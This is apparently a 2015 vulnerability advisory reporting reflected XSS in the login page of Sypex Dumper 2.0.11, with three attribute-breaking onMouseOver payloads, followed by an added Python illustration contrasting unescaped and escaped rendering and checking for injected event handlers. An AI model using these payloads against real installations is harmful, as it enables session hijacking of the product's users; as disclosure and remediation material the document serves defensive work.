Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org
Source: http://hyp3rlinx.altervista.org/advisories/AS-SYPEX0529.txt
Vendor: https://sypex.net

Product:
Sypex Dumper 2.0.11 is a PHP web based MySQL database management system.

Advisory Information:
================================================
Sypex Dumper 2.0.11 XSS Vulnerabilities

Vulnerability Details:
=====================
The login page input fields are vulnerable to reflected XSS via the POST method: the submitted host, user and pass values are reflected into the response without adequate output encoding, allowing remote attackers to execute arbitrary script in the context of a user's browser session. The payloads below assume the reflected value lands inside a double-quoted HTML attribute; the leading double quote closes that attribute and the remainder adds an onMouseOver event handler to the same element.

Exploit code(s):
===============
host="onMouseOver="alert(666);
pass="onMouseOver="alert(666);
user="onMouseOver="alert(666);

Disclosure Timeline:
=========================================================
May 27, 2015: Vendor Notification
May 29, 2015: Public Disclosure

Severity Level:
=========================================================
Med

Description:
==========================================================
Request Method(s):
[+] POST

Vulnerable Product:
[+] Sypex Dumper 2.0.11

Vulnerable Parameter(s):
[+] host, pass, user

Affected Area(s):
[+] Login page

===============================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

(hyp3rlinx)
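Added illustration (not Sypex Dumper's code and not from the advisory author): a hypothetical login template that reflects the three POSTed fields into value="" attributes, rendered once without encoding and once with quote-aware HTML escaping, plus a small check that reports whether the advisory's payload managed to introduce an on* event-handler attribute. The template, the field order and the helper names are assumptions made for the example; the payload string is the one published above.

```python
"""Attribute-context reflected XSS: unsafe vs. escaped rendering of a login form.

Hypothetical stand-in for a login page that echoes POSTed host/user/pass
values back into <input value="..."> attributes. Not the product's own code.
"""
import html
import re

# Payload published in the advisory; the leading quote closes value="" and the
# rest becomes a new attribute on the same <input> element.
PAYLOAD = '"onMouseOver="alert(666);'
FIELDS = ("host", "user", "pass")  # assumed field names, matching the advisory


def render_unsafe(post: dict) -> str:
    """Reflect POST values into value="" attributes verbatim (the bug class)."""
    return "\n".join(
        f'<input type="text" name="{name}" value="{post.get(name, "")}">'
        for name in FIELDS
    )


def render_safe(post: dict) -> str:
    """Same form, but every reflected value is HTML-escaped with quotes encoded.

    html.escape(..., quote=True) plays the role of PHP's
    htmlspecialchars($v, ENT_QUOTES): the attacker's '"' becomes '&quot;' and
    can no longer terminate the attribute it was placed in.
    """
    return "\n".join(
        f'<input type="text" name="{name}" '
        f'value="{html.escape(post.get(name, ""), quote=True)}">'
        for name in FIELDS
    )


def injected_handlers(markup: str) -> list:
    """Return on* attribute names found on <input> tags in the rendered markup.

    A crude attribute tokenizer is enough: the only question is whether the
    attacker's quote closed value="" so that the remainder parses as a second,
    attacker-controlled attribute (browsers accept the missing space).
    """
    handlers = []
    for tag in re.findall(r"<input\b([^>]*)>", markup, flags=re.I):
        for attr in re.findall(r'([A-Za-z_:-]+)\s*=\s*"[^"]*"', tag):
            if attr.lower().startswith("on"):
                handlers.append(attr)
    return handlers


if __name__ == "__main__":
    # Constructed request body: the advisory's payload in all three parameters.
    post = {field: PAYLOAD for field in FIELDS}
    print(render_unsafe(post))
    print("unsafe handlers:", injected_handlers(render_unsafe(post)))
    print(render_safe(post))
    print("safe handlers:  ", injected_handlers(render_safe(post)))
```

When retesting a fix, the thing to confirm is that the reflected quote comes back as `&quot;` and that no on* attribute appears on the element; in PHP that is what `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')` on every reflected value achieves. Escaping only `<` and `>` would not help here, since the payload never leaves the attribute context.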